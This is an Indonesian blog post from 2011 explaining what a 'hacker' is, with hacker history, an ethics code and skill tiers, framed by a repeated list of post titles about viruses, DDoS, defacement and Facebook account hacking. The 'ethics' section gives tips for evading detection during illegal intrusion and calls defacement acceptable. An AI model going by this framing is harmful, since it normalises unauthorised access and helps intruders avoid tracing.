  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

Selasa, 06 September 2011

Pengertian Seorang Hacker

|0 komentar
Pengertian Seorang Hacker


Banyak dari kita beranggapan bahwa hacker itu jahat, hacker suka membobol ATM, membobol computer, membobol security , mencuri password atau pun bertindak yang merugikan orang lain. Sekarang anggapan seperti itu sebaiknya sobat-sobat hilangkan karena hacker itu tidak sejahat yang di bayangkan, bahkan tidak jahat sama sekali.

Hacker adalah sekumpulan atau beberapa kelompok yang memiliki tujuan untuk mengembangkan ilmu pengengetahuan dan sharing informasi bebas tanpa batas dan gratis. Hacker adalah seseorang yang ingin mengetahui secara mendalam mengenai kerja suatu system, komputer, atau jaringan komputer. Mereka terdiri dari para programer yang ahli jaringan dan karena mereka jugalah Internet tercipta sehingga kita bisa menikmatinya dan membuat kita lebih mudah mencari ilmu, sharing pengetahuan, dll. Internet sendiri di ciptakan lewat pengembangan sistem operasi UNIX.

Istilah Hacker lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology), sebuah universitas di Amerika yang terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis). Saat itulah semua berawal, dari sebuah ruangan baru, “EAM room” pada Building 26 MIT, sebuah tempat yang merupakan nenek moyang dari “dunia baru” yang kini kita kenal, tempat nenek moyang sebuah mesin yang kini kita sebut sebagai “komputer”, mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi, dunia para Hacker sejati.

Sehebat apapun hacker tidak akan di hargai oleh hacker lain jika dirinya hanya mendapatkan ilmu dari hacker lain tanpa mau berusaha sendiri mencari ilmu. Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan. Mereka berpedoman pada kata-kata bijak : “Untuk mengikuti jalan – pandanglah sang ahli – ikuti sang ahli – berjalan bersama sang ahli – kenali sang ahli -jadilah sang ahli ”.

Apakah agan,agan ingin menjadi seorang Hacker sejati? Tetapi menganggap bahwa untuk menjadi seorang Hacker itu sulit, harus mengerti bahasa pemrograman ? Jika sobat-sobat memiliki niat belajar sungguh-sungguh dan giat maka tidak ada kata sulit bagi sobat-sobat. Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan para Hacker. Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah. Bahasan mengenai bahasa ini bisa anda lihat di www.python.org. Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python, [C], [C++] yang menjadi inti dari UNIX, dan [Perl] (http://www.perl.com ) serta [LISP] untuk tingkat lanjut.

Etika Hacker

1. Akses ke komputer-komputer – dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.

2. Jangan percaya otoriter/kemapanan – dukung desentralisasi.

3. Hackers haruslah dinilai berdasarkan kemampuan hackingnya – bukannya berdasar kriteria seperti derajat, umur, ras, atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer. Komputer dapat merubah hidupmu menuju kelebih baikan.
Sedangkan dalam prakteknya, Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:

4. Jangan merusak sistem manapun secara sengaja. (rmrf hard disk, crash, overflow, dll. Mengubah tampilan index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh administrator.)

5. Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.

6. Jangan meninggalkan nama asli anda (maupun orang lain), handle asli, maupun nomor telepon asli di sistem apapun yang anda akses secara ilegal. Mereka bisa dan akan melacak anda dari handle anda.

7. Berhati-hatilah dalam berbagi informasi sensitif. Pemerintah akan menjadi semakin pintar. Secara umum, jika anda tidak mengenal siapa sebenarnya lawan bicara/chatmu, berhati-hatilah!

8. Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah. Ya, ada banyak sistem milik pemerintah yang cukup aman untuk di-hack, namun resikonya lebih besar dari keuntungannya. Ingat, pemerintah punya dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit.


Tingkatan-Tingkatan Dalam Hacker

Elite :

Dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka sangat mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite:

Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

Developed Kiddie:

Sebutan ini terutama karena umur kelompok ini masih muda (ABG) & masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie:

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

Lamer:

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Hacking Scene di Indonesia

Pada era 80-an hingga 1994, lahirlah para Hacker Indonesia yang boleh dibilang masih “ASLI”. Pada umumnya mereka lahir secara otodidak dan secara kebetulan memiliki akses jaringan. Biasanya terdiri dari para pegawai perusahaan-perusahaan besar atau instansi-instansi pemerintah. Mereka ini terdiri dari orang-orang yang berkecimpung di bidang UNIX, VAX/VMS, dan tentu saja ahli jaringan.
Ketika Internet mulai marak di Indonesia, mulailah masyarakat begitu antusias mempelajari komputer terutama network security. Jika dulunya tidak ada aktivitas yang bersifat merusak, kini perlahan hal itu mulai berubah. Remaja-remaja ABG mulai “berterbangan” di Internet, mencari tutorial-tutorial baru, mencari pengetahuan-pengetahuan komputer yang tidak mereka dapatkan di sekolah. Mereka menjadi semakin pintar, bahkan melebihi guru-guru di sekolah mereka.

Namun layaknya seorang ABG, sebagian besar dari mereka jiwanya masih labil. Pengetahuan mereka masih sangat minim dan memiliki semangat tinggi untuk merusak. Mereka masih belum mengerti arti “Hack” yang sebenarnya. Mereka dengan sombong dan tidak tau malu menyebut diri mereka Hacker hanya karena berhasil mengakali Billing, menjalankan email BOMB, menjalankan exploit-exploit. Padahal mereka sama sekali tidak tau bagaimana tool yang mereka gunakan itu sendiri bekerja. Mereka tidak mengenal sang system, namun dengan sombong mereka menyebut dirinya Hacker. Tanpa tau apa itu TCP/IP, namun dengan banga menyebut dirinya Hacker. Padahal para Hacker sejati Indonesia yang kemampuannya sudah setara dengan para wizard di Amerika dengan tegas menolak dirinya disebut Hacker lantaran masih selalu merasa ilmu yang dimilikinya belum cukup. Yeah, inilah Hacking Scene (pangung perhackingan) di Indonesia yang cukup menyedihkan ^_^ namun bisa juga diangap wajar dan manusiawi.

Akan tetapi tidak semua dari mereka yang hanya bermulut besar. Tentu saja pasti ada diantaranya yang benar-benar memiliki kemampuan walaupun jumlahnya sedikit. Mereka yang sedikit ini kemudian banyak yang mengadakan pertemuan-pertemuan baik secara sengaja maupun tidak sengaja. Mereka tetap berexplorasi dan mencari pengetahuan, beraktivitas seperti biasa di lingkungannya tanpa menimbulkan kecurigaan atau prasangka dari masyarakat sekitarnya.

Aktivitas-aktivitas yang kini mereka lakukan cukup beragam. Pada umumnya ialah memoderasi forum-forum dan milis besar, menjadi OP di IRC-IRC Channel ternama, saling berbagi pengetahuan dengan menulis tutorial-tutorial, Artikel, Advisories seputar bugs-bugs baru beserta cara pencegahannya, mengadakan seminar-seminar tentang Network Security, menulis program open-source, serta melakukan berbagai aktivitas “Hack” sebagai sarana pemenuhan kebutuhan untuk berexplorasi.

Pada umumnya para Hacker peka terhadap keadaan lingkungannya. Anggapan bahwa mereka adalah orang-orang yang individualis dan egois tampaknya harus segera dihapuskan. Hal ini telah lama terbukti, anda bisa menyaksikan sendiri bagaimana pertarungan para Hacker Indonesia dengan Hacker-Hacker Malaysia saat negara itu ingin merampas Ambalat dari Indonesia atau perseteruan Hacker Indonesia melawan Hacker-Hacker dari Australia saat mereka mengusik Indonesia. Inilah cara berbeda para Hacker dalam mempertahankan negaranya, bukan dengan senjata, bukan dengan kekerasan, namun dengan ilmu pengetahuan.

sekian dulu artikelnya..
semoga bermanfaat bagii qt smuaa...



  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian